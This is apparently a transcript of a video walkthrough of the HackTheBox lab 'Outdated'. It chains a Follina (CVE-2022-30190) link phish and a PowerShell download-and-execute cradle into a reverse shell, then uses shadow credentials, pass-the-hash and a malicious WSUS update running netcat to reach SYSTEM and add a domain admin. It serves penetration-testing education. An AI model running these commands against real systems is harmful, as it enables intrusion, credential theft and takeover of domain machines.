What's going on YouTube? This is IppSec. We're doing Outdated from HackTheBox, which was a really fun box that featured 3 steps. And the first one is a little bit tricky because it is using the Folina exploit, but if you Google Folina, it's mainly based upon Word documents and creating phishing payloads. The Folina exploit itself was just internally how Windows rendered web pages. So you don't send a malicious Word document, instead you send a URL that just directs the computer to your server that serves the Folina exploit that gets you a shell on the box. Once on the box, you can run Bloodhound and decide that you have the AddKeyCredentialLink to a different user, which is the shadow credential exploit. Or not exploit, but technique, right? So you just configure that user account to allow authorization via SSL certificate so you can log in as them without changing their password. Once you get on the box as that user, you're a WSUS admin, so you can create a malicious Windows Update package, push it, and get code execution as root. So with that being said, let's jump in. As always, we start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it outdated, and then the IP address of 10.10.11.175. This can take some time to run, so I've already ran it. Looking at the results, we see about 12 ports open. The first one being SMTP on port 25, and its banner tells us it's hmail server, which is just an free SMTP server, I guess. We do have mail.outdated.htb, so let's add this into a host file. So sudo vi etc host, and we'll start fixing this up. So 10.10.11.175, add this host name. I'm also going to add outdated and outdated.htb. The next thing we have is domain. That's on port 53, so that's just DNS. We have Kerberos. It's telling us the server time, so if we ever do any type of Kerberos things, we should make sure a time matches up. And then we have all the standard Active Directory ports, so like LDAP, 445 is also open. The one thing that's odd is we don't have any web servers. I'm like looking around, port 80 would be between here. It's not there. 443 should be between LDAP and SMB. And I don't see anything on like 8080. So there is no web server. That being said, I'm going to test out just CrackMapExec against this. So CrackMapExec, SMB, 10.10.11.175. And the reason why I'm starting here is SMB is probably the quickest place to poke at first because there's not many tests, right? So we can see we can connect. We do have server signing set to true, SMB v1 set to false. It's host name, which is DC. So we could go and add that to our host file. I actually have it down here. So dc.outdated.htb. Casing doesn't matter for that, so that's fine. We could try null authentication, so -u with nothing, -p with nothing, and see what happens here. We may have to add --share to see if there's any valid shares on this box, and we get access denied. And this is going to be one of those weird things in pen testing that I think is often wrong, and I've also probably added to that because what's happening here is on like anonymous authentication, I think. So if I put any username here that doesn't exist, we get a success and we can enumerate the share. So right now, you'd think this authentication would fail, but the user doesn't exist, and I think Windows defaults to anonymous after that. It's definitely not guessed, because if we do guessed, we're going to get access denied as well, because this is a valid user on the box, right? So outdated guessed, and we should see access denied in a second. Where is it? It worked. That's not what I expected. I'm going to go to SMB client real quick. So if we just do SMB client -L, 10.10.11.175, this is why a lot of people call this null authentication, because they think the -n stands for null, right? That makes sense. That's what pen testers say. But if we look at it, -n is, or is it? No pass. So it doesn't mean anything with null authentication. What happened here is if we open up Wireshark, we can see exactly. So I'm just going to do sudo Wireshark, ton0, do this same thing, and we're going to look at it. In Wireshark, we see it's authenticating with workgroup/IppSec. It took my username. So this is not null authentication. This is just I guess it's assuming anonymous authentication is what I think. If we put U as equal to nothing, this would be null because a null goes into the username field, right? So if we see user is just workgroup, there's nothing after this. And here we get access denied, right? If we do guest here, it's actually, I think, going to give us a login failure as well. So I don't know why CrackMapExec did not, but this did. So now that I'm intercepting this, let's just see what happens. So in this, where I did guest, we have workgroup guest, and that went to login failure, right? We see that. What happens with CrackMapExec? I have no idea why. Sometimes when doing the videos, I do learn things, right? That's the benefit of slowing down. So we authenticated, and it's doing SMB3, so it's encrypted. Where is going to be, did outdated guest. Let's see. This is it, I believe. That is bizarre. Let's stop this real quick and restart. Run CrackMapExec. I just want to make sure I was going with the right one. So we did -u guest. I should be able to kill this off now. We've already authenticated. Let's see. Where is that packet? It's before this encrypted. Session log off. So one thing I'm noticing is CrackMapExec, which uses IppPacket, sends a lot more. So we authenticated with user, set up response, log off. So eyeballing this, I don't see guest ever get sent. I'm not sure what happened, but it's not really relevant to this box. Maybe something you want to dig into. These are just the type of paths I go down as I'm doing boxes to figure out my tooling. I don't know why CrackMapExec guest is different than that, but we can enumerate chairs with invalid usernames. That's the takeaway, right? Hopefully you enjoyed that rabbit hole. I'm now at a slight loss for words because I don't know what to explain, but that happens. Windows SMB is weird. We'll just leave it at that. And once this enumerates all the shares, we know there's going to be a non-default share that we can read, right? We have shares and read access here. So what I'm going to do is SMB client -n for no password. -u, we'll do a user that doesn't exist, so please subscribe. And then 10.10.11.175/shares to see what file is here, right? So we can do a dir. dir-a, I think, will show maybe /a. dir/?. I don't know. I was looking for a way to show hidden files. I don't think there are any. We have this knock-reminder.pdf, so we should try to download it. I think FTP has like a -a for all files. I'm guessing SMB client does not. But we downloaded the knock-reminder.pdf. So let's go open it and see what is here. So this is talking about a outage, and it's saying email this email, right? And it wants internal web applications. So what I'm going to do is use SWAKS to send an email to this, and then we're going to take a look at these CVEs, right? So SWAKS, if you don't know, I was hoping to get like help. The Swiss Army Knife SMTP client is what it is. But it makes it really easy just to send basic emails. So I'm going to add the -2. We're going to say IT support at outdated.htb because that is what is here. And then we'll do --from. I'll say root at ippsec.rocks --server mail.outdated.htb. We could also use the IP address, but it's in our host file, so it doesn't matter. The body of the mail address, and it wanted a what was it? A link to a web application, right? So we'll just give it HTTP 10.10.11.14.8, which is my IP address. And then we'll add the header of a subject message and just say internal web app request. I don't know if we need to add a subject or not, but whenever sending emails, probably should, right? I'm going to set up a netcat listener because the main thing I want to see is if anyone clicks this link, and then when they do, I want to see what the server header is. So now that that's sent, let's go and do some research on these CVEs, right? There's this CVE 2022-30190. So if I go to Google and search for this, we will find out this is going to be the Folina exploit. This isn't a good summary of it. It's talking about MSDT, which is one of the protocols we exploit, but I don't see many references to the special name Folina. So if we look, logarithm, and this is going to be how we start knowing it is going to be the Folina exploit. Now, the odd thing about this box is most people think of Folina, they think of Word documents, and that's common because that's the way this was mainly weaponized. But it's how Microsoft internally processes links. And they just use a method in Word to make Word reach out to a link and then exploit it, right? It's not exploitable via like Edge, because Edge has its own sandboxes and all those type of protection technologies around it. But Microsoft Office still uses just raw Internet Explorer that doesn't have as many mitigating things built in. So that's why it was heavily weaponized with Word. And I say that because now that we see the server header that reached out to us when sending this email, we see it's WindowsPowerShell. And if we take a look at the actual script, which we may do at like the Beyond Root section, all it's doing is an invoke web request to a URL, and it actually ends up being exploitable by Folina because it's just a headless thing making a request that doesn't have any protections built in, right? So how do we know this is going to be vulnerable? Well, looking at the user agent, we see Windows PowerShell, and then also see this version string. I'm not 100% positive what this means, but I'm guessing it's PowerShell version 5.1. I know 19041, this is going to be a internal Windows build number, so that's like the major release of Windows 10 probably or something. And then 906 is the minor release. So if I just Google 19041 906, and this is what you should be getting in the habit of, being able to just see these versions and guess what the numbers mean, right? And that's something that just comes with experience. We can see, based upon this page, this is going to be a KB article from March 29, 2021. If we look at Folina, when this CVE came out, I think it was June of 2021. Let's go back to this. Let's see, the Microsoft Bulletin. This will be a good page for it, right? Because this is when it hit the public. Let's see, where is a date? Executive summary. Yes. So installing the June updates. So last I checked, March is before June, so chances are this PowerShell is not updated, right? So if we do the Folina exploit here, we may get a shell. So let's test that out real quick. I'm going to Google Folina GitHub. And the trick here is going to be getting an exploit that is not in a Word document. So if we look at this file, this Folina.py, goes in and creates this HTML template. And I don't know exactly why we need a bunch of junk in the index. I just know we do. Specifically, you need like 4096 bytes before the actual payload. Not sure exactly why. It's probably some weird antivirus thing, right? That it only scans the first 4096, and after that, then it works. I'm not sure, but that makes sense in my mind. And you saw here, this is where the exploit goes. It's just in like a templating language, I guess. It's not a real template because it just treats this as a variable. But for any web developer, that's how you would reference a template in code. So if we look at what payload is, if we go to Folina.py, let's see. in command, it's setting this payload. It's going to be msdt, then pwc, pcw diagnostic skip, and then it gives this bunch of things and does invoke expression to, I guess, base 64 here, right? So this was a long way of saying, I just want to run the script with the command and give it a command to execute code. So let's do a git clone. I think that's on my clipboard. It's not anymore. So let's grab Folina.py. And we can go here. And then when we execute Folina.py, we want to probably give it -m command type. This doesn't matter. We'll just give it RTF. -c, and this is going to be what we want, right? I'm going to say IEX new object net.web client download string http 10.10.14.8/shell.ps1. So if I run this, what happens? We get a permission denied. So let's run it with sudo, and we see localhost exploit.html. So if I look at this, look at the source, we see now where that payload was, it's replaced with that link, right? So I'm going to copy this, and let's just make a directory, www, go in here, curl to download it. I'm just going to save it as index.html. And now we have the Folina exploit as index, and it's making people execute shell.ps1. So we should put a shell here. What I like using is ConPtyShell for Windows. And the main reason I like doing this is it gives us a fully interactive reverse shell. So we have tab autocomplete. I can't tell you how much I love having tab autocomplete on my reverse shells. So I'm just going to copy this. So vshell.ps1. Set paste it in. And then the instruction it gives us is generally it wants us to invoke web request and then execute a command afterwards. I just like putting the command at the end of the PS1 file. So if it ever loads this, it will send it. We'll do 9001 10.10.14.8, which is my IP address. And then the last thing it wants is an STTY thing. And I'm making this its own pain intentionally because before doing this NC command to listen on the port, we're doing some STTY stuff to send it, right? And if I do it in a small window in tmux, when my reverse shell gets sent and I expand the shell, my terminal is going to be all wonky, right? So whenever using ConPtyShell, I just like doing it in its own pane. So now I should be able to do Python 3 http.server on port 80. Let's see, I forgot the -m for module. And now I'm going to use the, not Folina exploit. We're going to go and use SWAKS to send the same exact email again. I'm going to clear the screen just so it's cleaner. And now this time when PowerShell reaches out to us, it's going to download the index.html, which has the Folina exploit, and the Folina is going to redirect it to the PowerShell thing to give us the reverse shell. Hopefully this works. If not, then we have some debugging to do, which honestly, I don't know how I would approach debugging this. So we're just going to pray it works the first time. You should get this to hit within like a minute. If you don't, then try sending the email again. And after 2 or 3 times, that's when I would see what I'm doing here. One thing I know from playing this box previously is if you send things that end like test.doc, I think the HMail server thinks this is spam and will never click it. So you can't send it documents, but you can just send it links. I'm just going to send this one more time to hope it works. And I'm going to pause the video. We'll resume once we see it getting shells. There we go. We do have it hit /, but it did not follow and hit our exploit, which is my worst case, right? So we have to look at our web server real quick. So go in www vindex.html and see what is happening here, right? So it did from base64 string, and then we have all of this. My first guess is I screwed up some base64, or screwed up my IEX command. Looking at it, still did not hit. Send it again while we take a look. So cat www index, and let's copy and paste this to see what we have. So echo -n, base64-d, IEX, new object, net.web client, IEX, new object, net web client, download string. I think this looks valid. So I'm not sure exactly what is screwed up. We're just going to try it to get another hit to make sure it works. Folina isn't always the most reliable exploit, so maybe it'll work the second time, right? That's going to be the hope. And if it doesn't, more debugging, I guess. And there we go. We have a hit on slash. And there we go. It hit shell this time. I'm not exactly sure what happened, but honestly, nothing changed on my files. So this this exploit is just a little bit unstable, but if it doesn't work the first time, always try it again. And here we go. We have a reverse shell on this box. If I look at who am I, I'm the user btables. Oddly enough, I'm like in this weird app data directory, right? But if I go all the way up and look at this, go in desktop, there isn't a flag here, right? And do dir here. There is Windows PowerShell scripts. Is there anything here? Nothing there. So let's look at just users. And there is an administrator user on this box. Also, if I ran, instead of doing system info first, let's do ipconfig. I see my IP address is 172.16.2020, which is weird. I would expect to be on the 1010 network, right? So if I do system info, it's going to get a list of information about this box, right? And the first thing I notice is my network card is Microsoft Hyper-V. So I'm actually in a VM. Well, I'm in a VM because it's HackTheBox, but I'm in a nested VM. This is a VM in a VM. I'm not used to seeing the Hyper-V network adapter. I think it's like Microsoft E1000 potentially. We'll take a look when we pop this box at system info to see what the NIC is. But I don't think Hyper-V is common in VMware boxes, which is normal in HackTheBox. Also, if we look, we can see, let's see, is there anything else that says Hyper-V? Windows 10 Enterprise N, Virtual x64, AMD, so it's a single processor. That's also like indication you're in a VM if you only see one processor because of hyper-threading. You normally see multiple, right? So if you're writing software and you want to detect VM, that's a common one. Hypervisor has been detected. So I'm guessing it's mainly just the NIC that is the giveaway, right? If I do host name, my host name is client. So the next thing I'd probably run is like an ipconfig/all to see the DNS servers. That's 172.16.20.1. So we could run nslookup and see if it works in this shell. It looks like it does. 20.1 to see what this IP address is if it responds to us. It doesn't. Let's see. We're going to query it for 127.0.0.1. We don't get anything. So not much we can do with nslookup real quick. If I do it whoami/all, this is going to get all our information. And this is going to be what tells us we're part of a domain, right? If you ran this on your computer, it'd be like since this hostname is client, I think it would say client/btables, right? The hostname of the box, or maybe it would just say btables and you wouldn't even get a full SID. Not exactly sure what we get. But my computer on my desktop is not domain joined. So let's see, right? So I'm going to do whoami/all, and this is just my regular PC. My hostname is BLD, so I was right about that. You do get a SID. Let's see. What is that SID? Is that going to say something easily identified? I don't think so. Maybe this is, I don't know. I don't know enough to talk about SIDs. But if this was client btables, I know I'm not in a domain. But since I'm in a domain, we'd probably want to try getting this password, right? The password itself is not crackable. So it's not going to really help us that much. But I would show how to get hashes, right? So if I do responder, sudo responder, right, -I ton 0. Oh, shoot. I forgot responder is hosed on this box. Let's see. Give me 1 second. Python 3, 9, I want to say, responder.py-I ton 0. I think this will work. There we go. So now my box is listening on port 445. All I would do is like get content item 10.10.11 or 10.10.14.8. Try to get something off this share, and we get the hash. This isn't crackable, so I'm not even going to try. But if I'm doing an engagement, that's the very first thing I would do, because if I get kicked off this box, maybe I can spend a lot more time trying to crack this if I'm on an engagement, right? Always want to get some type of information. So I guess I would run Bloodhound at this point. And since I don't have the credentials, the easiest way to run Bloodhound is just through .NET. So let's see. I think it's Sharp Collection, GitHub. Yes, this thing. GitHub Flang Vik. But I always mispronounce his name. I don't know how to pronounce it. But this GitHub repository. And we already have it installed. So if I go to Sharp Collection, do a git pull. The key thing to be, let's see if it says it here. Let's see, SharpHound, right? So we can see on this list, SharpHound isn't being updated anymore for 4.0 and 4.5. It's still going to exist in these directories, but it's not going to be an updated version. So if you ran the 4.5 Bloodhound version, and you ran the most up-to-date version of Bloodhound right now, when you go to import the results, it's going to tell you some version mismatch. So you want to use the one on .NET 4.7. Otherwise, when you import it, you have errors. I also don't really know the difference between any x64 and x86 because .NET doesn't really have architecture, but you can still compile it for an architecture. It's weird. I always choose any and never have any issues. If I choose like x64, sometimes I'll have an issue. So I always get in the habit of choosing any. So let's go in www and copy SharpHound here, right? So copy SharpHound.exe, HTB, outdated, www. We have it here. And now I can just go to like program data and do a curl 10.10.14.8 SharpHound.exe, out file SharpHound.exe. And this works because my reverse shell is a PowerShell and it's a new version of PowerShell, so it has the curl alias built in. And SharpHound.exe. So let's do SharpHound.exe-c all to do all collections. And then while this runs, I'm going to make a directory SMB, and we're going to start an Impacket SMB server. And we can see this version of SharpHound is compatible with the 4.2 release of Bloodhound. If we did the 4.5 version, .NET 4.5 version, it would be 4.1 release of Bloodhound. If you try to import that into the latest, it errors. Only reason I'm spending so much time harping on that because I spent like an hour and a half debugging that issue to realize I was on the wrong version of SharpHound. So let's do sudo impacket SMB server. Let's see. We want to specify SMB to support. And then the share name, I'm going to call it share. And then the path I want to share out is the current working directory. So now I'm there. I should be able to just copy, let's see, this zip file, which is the Bloodhound thing, to 10.10.14.8/share. And we see it copying over. So it is now done. I'm going to delete this file. So let's delete it. I should also stop this share immediately. And out of habit, I'm copying the sensitive file out of this. Because if I didn't do this and start the SMB server back up, anyone that just does an SMB scan would see that file, and that would be potentially a security issue, right? So I always try to keep my SMB directories clean when I do file transfers. Let's see. Sudo. We got to start neo4j now because we're going to run Bloodhound. So now that that's running, we can go to opt. Let's see. I'm going to download the latest version of Bloodhound. GitHub, Bloodhound. Here, let's see. There should be a releases. Where is Linux, not ARM, this one I want. Copy link, wget, actually, cd opt. See, I have a Bloodhound thing here already. Bloodhound, there we go. So unzip Bloodhound Linux x64. And we should be able to execute Bloodhound, log in with our neo4j credentials, and we'll upload the collection. Uploading data, and it says complete. So this is all good. So once this finishes, we could just do the analysis. And my very first one is find all domain admins, just to make sure we have data. And we can see administrator does exist. So the first thing I do is search btables because that's the user we have access to. And we select him, right click, mark as owned. Then we go to analysis and shortest path from owned principals. And we can see a weird path. So btables at outdated is a member of IT staff. IT staff has this, oh man, I zoom in and the text isn't changing. It's AddKeyCredentialLink to sflowers, and sflowers can PowerShell remote to dc.outdated.htb. So if I right click on this, add credential link edge, and click help, it tells us. And this is going to be a shadow credentials thing. If we click on abuse info, it wants us to run Whisker with the command /add target and the target principal. So I'm going to Google Invoke-Whisker because generally that's what Windows things are called. We could also look for whisker.exe, but if I do Invoke-Whisker, I'll probably find some PowerShell script to just load it quickly. So if I look at this, Invoke-Whisker.ps1 out of PowerSharp pack, and there is a binary here. So let's go back to our shell, go in wget Invoke-Whisker, and I don't know why it resolves to IPv6 sometimes on wget. I'm just going to call it whisker.ps1. Set mode paste, and paste this in. There we go. So now, all I have to do is an IEX. So IEX, new object, net.web client, download. I wonder if I have tab autocomplete. I do. Not that that's saving me any time because there's a lot of download stuff. But we can download the string http 10.10.14.8. I called it whisker.ps1, I believe. So we do that. And that's the wrong quote. Oh God. Can I control C? I can. I love this reverse shell. Console PTY is amazing. Or ConPTY shell. That's the name of it. But download the string. And now I should have Invoke-Whisker. I do. Tab autocomplete confirms that. So we go to Bloodhound. We want add/target. And then, what was it? S-flowers or S-flower? S-flowers. Let's see. Oh, Invoke-Whisker. If I look at the code, it wants a parameter called command. So we can do -command and add it. So if we look at all this output, we see it generated a certificate to do the shadow credentials attack and says we can now run Rubius with the following syntax. So this is a lot of text and it can easily get lost. I'm going to copy it on my machine to a note, right? So we copy this, v Rubius s-flower.text, paste it in, so at least we have it. And the one thing I want is this password. So I'm going to try just Evil-WinRM real quick. WinRM -I 10.10.11.175 -u s flowers. Wonder if I can specify a domain like this. -p. And we'll put this password in. And we'll see what happens here. I think it's going to give me access denied, but it may not. Let's see. Come on. Establish the connection. It's not the fastest thing. And there we go. It failed. And if we looked more into it, we know it failed because the password is not the password for the account. It's the password for the certificate. I'm not 100% positive on the shadow credential attack, but from my understanding, you're adding a SSL certificate to an account to be able to act as a secondary authentication mechanism. So we're just authenticating to this user via certificate. It's a different form of password. I copied that Rubius thing again because the next step we want to do is upload Rubius to the box so we can run the command. Because if you looked at it, it's running the Rubius with the ask for TGT, so it's probably going to return a ticket granting ticket for that user, right? So let's go back to a www directory and copy from sharp collection Rubius. Let's see, net framework for 7 any rubius.exe, copy it here, go back to the reverse shell, curl 10.10.14.8 rubius.exe-o rubius.exe, and then we'll just execute what it tells us to. When I copied this, it went all on separate lines. Shoot. Let's see. I'm going to v rubius.text, or what do we call it? Rubius s-flowers. So we want to remove all these line breaks. So we'll do the lazy way of just hitting home and backspace 30 times. And hope this hits everything on one line. And we'll copy it outside of tmux to see if this works better. I'm guessing that ConPtyShell screwed up my copy and paste, is what I had to guess. So, // paste it, and that looks... looked better for a second. Try it again. There we go. This looks like it's doing it. Asking TGT. Looks like it authenticated. Let's see. It's giving it time. And there we go. We have a ticket, and it also gives us the NTLM hash for this account. So if I went back to this command and we replaced the sflowers with the -h and tried logging in with this hash, I believe it will work. Yep, it did. So we know how we specified the username here and password was a valid way, right? But now we have Evil-WinRM shell, and if I do a host name, we are now on the DC. And whenever I get a new user, I always like examining who am I /all, because it tells us information about the user. The username and SID, not too interesting to us. The main thing that is interesting is going to be the groups and or the tokens, right? So we see the everyone group, the remote management users. These are all default groups. I generally glance over the default groups and turn my eye towards the ones that have a longer SID. In WSUS Administrator, this is going to be a default group to Windows update services. But since it's a longer SID, it means this domain was, or this group was probably created after Active Directory because you installed WSUS, right? So we're a member of WSUS Administrators, which leads towards this attack. I do want to install or run WinPs real quick against this host just to see if it highlights this group. I know Bloodhound doesn't, oddly enough. So let's just download the latest version of WinPs real quick, and then we'll show the Bloodhound output for this user while this runs. So here, latest release. Let's do WinPs any. This looks good. Let's save the file. Go to a www. Downloads. Is it lowercase WinPs? Yep. So we can download it there. And we'll just run it on this box, right? Let's see. We don't want the reverse shell. We want it here. We'll go into program data. And then curl 10.10.14.8. WinPs any. Download it. Execute. And while that runs, we can look at Bloodhound and set now sflowers to be owned. And if we do analysis, shortest path from owned principals. Whoops. Is that what I want to do? Shortest path from owned principals. There we go. sflowers. And still just tells us we can remote into the server. It's not picking up anything about the WSUS group, right? We can look at first degree group memberships to see what groups we're a part of, domain user, WSUS administrator, remote management. So it does pick up this group. It just doesn't have any information on this exploit path that we're going to do. Looking at this, if we search for WSUS, it's not highlighting WSUS administrators in red, so it's guessing nothing too interesting. It does tell us that use WSUS server, so we can, it points us towards these exploits, right? So maybe these are the same thing. See, I actually did not see this. What is this going to do? So this is a man in the middle to inject an update. So we're essentially going to be doing this, but we're not going to do the man in the middle piece. So what WSUS is picking up on here, and this is all going to be a guess because they're not prepared for this, but it sees the endpoint is HTTP and it is using that WSUS. So because this endpoint is HTTP, if we man the middle it, we can replace the binary with things. And since this is saying man in the middle, that's going to be it, right? WSUS should be on HTTPS, but because we're a member of the administrator group, we're not doing any fancy man the middling here, right? So this exploit saying a computer tries to update, you're man-in-the-middling the connection, it goes to download this update or download the cabinet of updates, and your computer says, you have this update to download. Go download and run the code, right? And that's possible because it's plain text. What we're going to do is just create a malicious update. And because we're a member of the administrator and have the permission to create the update, we don't have to do any man-in-the-middling. So I'm guessing that was it. And WinPs isn't going to tell us anything more about WSUS. Oh, shoot. I just closed WinRM. Oh, well, we'll reopen it. So I like using a tool called SharpWSUS for this technique. So if we go here, they have a blog post. And the key thing about when doing this attack is the binary you use with WSUS has to be signed from Microsoft. And this may sound like it's a hard thing to do, but I mean, it's any living off the land binary, and sysinternals is signed with Microsoft, right? So if we go down here and look, we'll see this is using the psexec binary. And then they're just using it to add a user. So let us download SharpWSUS. And there's no compiled binary, and I know this isn't part of the Sharp collection pack, so we just should compile it ourselves. I'm going to move over to a Windows machine so we can download this and compile it with Visual Studio. So just copy it here, open it up, and then we just change this to be any and this to be x64. Sure, we can upgrade to 4.8 and hope it is compatible with the machine. Hopefully it is. I'm actually not sure. I know this is the latest version of Visual Studio Code, so there's always a chance that Visual Studio 4.8 isn't available on that host, and I'll have to do something to download the 4.7 version. So going here, I wonder if that's this. It probably is. Let's just turn Defender off. So let's see. Yeah, WSUS. So manage settings, real-time protection off. Come on, Defender, stop complaining. So we'll copy this and then paste, which isn't there. Let's see if this works. Okay. I dragged it from another window and we have it. So I'm going to copy it in dub, and then we can download it, right? So let's go. Come on. CD/program data. This is not the most fast shell, but curl 10.10.14.8 SharpWSUS.exe, and let's see if it downloads fine here. Try to execute it. dir. It's there. I guess we just don't have tab autocomplete in Evil-WinRM. And running it, it looks like it works. So that's good. I was worried that it just wouldn't run because of .NET 4.8. So we can see this all works. We can do inspect, and it pretty much gives instructions on how to do it, right? We just need to upload psexec.nexe and give it these arguments and approve everything. So let's go psexec, sysinternals, and download this version. And we have to use this version because this is going to be signed from Microsoft, right? So let's save ps tools. And let's see, cd downloads, or cd dub, move downloads ps tools, unzip ps tools, and we have psexec64.exe. So that's what I'm going to copy. So we'll do cp, or not copy, curl 10.10.14.8 psexec64.exe to psexec.exe. Do a dir, we have it. So let's see. Let's do that SharpWSUS command again so we can see what we have to do. Which, if you understand WSUS, it should be relatively self-explanatory, but I don't think I've done a good job really covering WSUS. So this is like Windows Service Update Server, I believe, and most places probably don't even utilize these. They just use Microsoft's default WSUS server. But large organizations have the ability to stand up their own Windows Update server and have the workstation check in. And the benefit to this is you have the WSUS server, you can decide which patches get deployed because every now and then Patch Tuesday does brick a lot of operating systems or computers. So you have the ability to stand up your own WSUS and decide which updates your computers install. Additionally, what this does is save on a lot of bandwidth. Because let's say even Office, it has 200 computers in it, and 200 decide to download the Microsoft update at the same time. You're going to have a lot of bandwidth issues. There's like a thing called branch cache and peer-to-peer that Windows does every now and then to speed that up. But in most cases, the olden times, they all go to Microsoft and you'd like have slow internet. So you'd stand up a WSUS server at your branch. So all the computers went to that update service, right? So what this command is going to do is create a malicious update. And that's why we have to have a Microsoft sign thing, because WSUS servers natively treat Microsoft sign things as non-malicious. So we're going to copy the command up to this point. So /sharpwsus, and then we're going to change the payload because it's actually in c:\program data /psexec.nexe. And then these arguments are not valid. Well, up to the -d is, right? But we don't want to run who am I and write it to c:\text.text. We want to instead run it to, let's see, we got after D. So grab this and give it the title. And I'm going to give it a meaningful title. We'll call this local admin update, I guess, right? Because this is adding the user WSUS demo with the password of password123 bang, and then adding him to local administrators group. So if the computer does install this update, we should get a local admin. And it looks like it does not like it because of those ampersands. So let's try escaping them. So if I just do a / here, still does not like it. We could try to, instead of escaping them, maybe put these as single quotes. I'm guessing this doesn't work because otherwise it would have done that, right? So that's a single quote, and this is a single quote. Let's try this. Unhandled exception. Because I'm guessing this payload does not exist. psexec.nexe. So it looks like we have added it. So what this did is go in the WSUS server and create this update. So what we have to do next is approve it. And we got the ID here. So I'm going to do first a host name. I think it was DC. It is. So we can do WSUS with the update ID and then /computer name dc.outdated.htb. It wants the FQDN, which is fully qualified domain group. And then the group, what did we call this? Let's go up to look at what group we did. Let's see, add. Where's our command? I'm based upon the way this looks in my tmux. I don't think it worked. Like it's got this ampersand, like what? I don't know what that is, but maybe it's some weird just encoding that it did. So I think group name, we just do this, right? And now we have approved it. So what this did is approve the update, local admin update to this DC, right? So now what we want to do is instead of the approve, we want to run check. And what check's going to do is tell us if it is installed or not. And this one said cannot be found. I wonder if we need this. Cannot be found. How do we run check? Delete check. update ID. What? This should have worked, right? Well, that doesn't because I'm the period. Update is not installed. Okay. So it's probably going to take probably somewhere between 3 to 5 minutes, I would think, to install it. But if it does install correctly, it'll say update is installed, and we run net user. We should see the user WSUS admin, was it? What was it? Host name, create. Yeah, WSUS demo is the user we should see if this installs successfully. So it's not there yet. Let's run the check again. Update is installed, but we don't have it. And keep in mind, when I did this, I mentioned there's probably some special characters here that this command does not like. So what we should do instead is simplify this, because I always say when you have a complicated payload and it doesn't work, why don't you just make it less complicated, right? So I'm going to get rid of this whole CMD thing. And what we're going to do instead is say, let's execute C:, program data, nc.exe-e cmd, and we'll send it to me on port 9001. So we have to put netcat in this directory. So I'm going to call this one rev shell. And I can create this, and it's not going to get sent to install until we do the approve command. So I'm not on like any type of race to get netcat on this box right now. So let's go copy outdated netcat 64. So cp to nc.exe to here. Cannot stat. I guess that doesn't exist anymore. We'll do real 2. Okay, that one works. If you didn't know, the locate command is like a quicker version of the find, but it depends on the database like mlocate.db, which I don't know where it is. Envarlib mlocate. So it depends on this database, and that gets updated whenever you do update db. So I'm guessing my database was just out of date, and it was telling me nc.exe existed in a directory that no longer exists on my box. But we copied it now, so 10.10.14.8, nc.exe-o, nc.exe. Not found. Ls, let's move nc64.exe, ncexe. There we go. So now I have netcat here. So we ran this command to create a malicious update that sends a reverse shell to us. So we should listen on 9001. And since it's Windows, I always like using rlwrap. I guess we could have done like a PowerShell ConPtyShell, but the reason I'm not doing that one again, even though we knew it worked from earlier, is that involves PowerShell and a lot of special characters, and I want to get rid of any type of complexity. So that's why I'm just defaulting to a regular shell. What we have to do is go and get the update ID to approve it. So let's see. I'm going to copy this. We can go to the previous approval. And all we want to do is replace this update ID with our new one. So now on the WSUS server, there is failed to target group. Oh, we didn't name this one. So rev shell, I think is what we called it, one word. Let's go up. The group name, local admin update. Yes, rev shell, one words. There we go. Now we have approved it. So when this one gets installed, we should get a reverse shell back. So I can get rid of the group name, just do a check, and update is not installed. So whenever the WSUS server checks into, or the WSUS agent checks into the server, it'll say, hey, there's one update approved for us to install, and it should go install this, right? I'm just going to check net user again to make sure we don't have a WSUS demo user. I think it's just because of some weird bad character in that argument. So still not installed. I'm going to pause the video and we will check in like probably a minute or two. Oh, wait, I didn't even have to pause it. So you saw me run it. It said not installed there. Did it again as we got the shell. And here we are. So if I do cd/users, we will have the administrator user that we can get into because we are NT authority system, right? So we can go in desktop and get root.txt. So hope you guys enjoyed that attack. It's kind of a weird attack, I think, in this because I've never seen a user be added to the WSUS Administrator Group and not be a member of domain admins anyways. Generally on WSUS attacks, it's going to work with a man in the middle where they have HTTP as the WSUS server. But this was, I think, 2015 when that attack started coming out. It's 2022 now, so like 7 years later. I want to say it's relatively rare to see WSUS on HTTP and not HTTPS. So it's a fun attack, fun lateral movement, but not really something you can really abuse easily, right? That's why you probably haven't heard of this attack just because it's edge cases. But every now and then there is that edge case that you do land on it and you're happy, right? So I'm guessing that's why also the attack isn't in Bloodhound because edge cases. Anyways, I hope you enjoyed the box. That's probably going to be most of the video. I want to try enabling remote desktop and running through the attack looking at the WSUS admin panel, but I'm not actually positive that's installed in this box. So let's just enable remote desktop because I don't think that was installed. And to do that, we just edit the registry. So I should have had this drop me into a PowerShell prompt, not CMD prompt. But you live and let learn. So I think this is the name we do. And then it's F deny TS connections. I did a single quote there, dash value 0. So we're telling it not to deny connections. Didn't error on us. So now if I do NCZV 10.10 11 175, I want to say this box was 338.9. If we do 445, does it connect? Connects there. Not on that. Let's try PowerShell -command enable net firewall rule display group remote desktop. And we should do that in single quotes. Do we have 3389? Sweet, we do. Awesome. Net user IppSec password 1 /add net user local administrator IppSec /add. Oh, wait, it's net group. I think administrators. Is it local administrator? Net group. Net group. Domain admins IppSec add. There we go. And our password. Password 1. So if I do x free RDP /f for full screen, v, I don't know why it's v, but that's IP address. U IppSec p at SSWORD1. Do we log in? Awesome. So now we're a remote desktop into this box. I want to say Control-Alt-Enter. Oh, that's going to screw up my hotkey. Probably should have done a different resolution. Let's just see if WSUS is on this, right? Because I don't know how to put this in a window. It's a control. Yeah. We'll play with the resolution after we get WSUS open. So let's go manage servers. It's been so long since I did this, but I'm guessing WSUS is going to pop up here and we'll have the pane, right? Come on. This is going slow. I wonder if I can do it quicker this way. MMC. Yes. Control M to add remove snap-in. Come on. Control M. WSUS. Sweet. Windows Server backup. Update server. This is it. So add. It's taking its sweet time. Sweet. So this is how you would add or manage a WSUS server. We're in the administration panel right now. So we can see all updates. And I bet if we do all updates, we're going to see like a reverse shell and things like that. Right now we don't because it's unapproved. But if we sort this by approved, status any, refresh, show me the updates. I don't know why it's not. Any except declined. Show me the updates. Well, we have things here. Oddly enough, like I'm not seeing the package. Let's do any. Refresh. So this is showing the computer in this. So these are the two groups I did, and the SharpWSUS creates a computer group to add which targets are in it, right? So this is the local admin update we did. If this ever decides to load, it should show the DC here. But this is what tells it to actually install. But I'm not sure why we don't see the updates here. Loading updates 100%, it's done. If we do any, refresh. So what I'm going to do is create an update, and then we're going to check 